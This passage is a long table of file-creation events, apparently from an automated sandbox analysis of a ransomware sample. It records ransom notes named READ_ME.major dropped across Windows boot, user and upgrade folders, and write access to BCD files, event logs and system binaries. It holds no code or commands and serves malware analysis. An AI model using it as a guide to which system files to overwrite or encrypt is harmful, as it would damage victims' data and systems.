| Create | \Boot\lt-LT\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\lv-LV\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\nb-NO\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\nl-NL\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pl-PL\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pt-BR\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\pt-PT\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\qps-ploc\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\Resources\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ro-RO\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\ru-RU\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sk-SK\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sl-SI\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sr-Latn-CS\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sr-Latn-RS\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\sv-SE\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\tr-TR\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\uk-UA\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-CN\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-HK\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\zh-TW\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\updaterevokesipolicy.p7b | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\memtest.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\bootvhd.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\BOOTSTAT.DAT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\bootspaces.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\BCD.LOG2 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\BCD.LOG1 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\BCD.LOG | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Boot\BCD | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Windows PowerShell.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\System.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Setup.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Winlogon%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Windows Defender%4WHC.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Windows Defender%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-User Profile Service%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-TWinUI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Store%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SMBServer%4Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SMBServer%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SMBServer%4Audit.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SmbClient%4Security.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SMBClient%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Shell-Core%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Shell-Core%4ActionCenter.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SettingSync%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-SettingSync%4Debug.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Ntfs%4WHC.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Ntfs%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-NCSI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-MUI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-MUI%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-LiveId%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Known Folders API Service.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-International%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Dhcp-Client%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-DeviceSetupManager%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-DeviceSetupManager%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Bits-Client%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppReadiness%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppReadiness%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppLocker%4MSI and Script.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-AppLocker%4EXE and DLL.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Key Management Service.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Internet Explorer.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\HardwareEvents.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Logs\Application.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Recovery\Logs\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Recovery\ReAgentOld.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\All Users\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default User\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Default.migrated\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\FD1HVy\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\Public\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Users\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\2052\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\dll1\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\dll2\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\resources\READ_ME.major | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\WinREBootApp64.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\WinREBootApp32.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\Windows10UpgraderApp.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\windlp.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\wimgapi.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\upgrader_win10.log | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\upgrader_default.log | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\PostOOBEScript.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\HttpHelper.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\GetCurrentRollback.EXE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\GetCurrentOOBE.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\GetCurrentDeploy.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\GatherOSState.EXE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\esdstub.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\ESDHelper.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\EnableWiFiTracing.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\DWTRIG20.EXE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\DWDCW20.DLL | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\DW20.EXE | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\downloader.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\DevInv.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\cosquery.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\Configuration.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\bootsect.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \Windows10Upgrade\appraiserxp.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\Logs\PartnerSetupCompleteResult.log | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\Logs\oobe_2017_09_07_03_08_57_737.log | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\Logs\downlevel_2017_09_07_02_02_39_766.log | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\SafeOS\SetupComplete.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\SafeOS\preoobe.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\SafeOS\PartnerSetupComplete.cmd | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\SafeOS\GetCurrentRollback.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$GetCurrent\SafeOS\GetCurrentOOBE.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$Recycle.Bin\S-1-5-18\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1025\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1025\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1025\eula.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1028\SetupResources.dll | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | \588bce7c90097ed212\1028\LocalizedData.xml | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
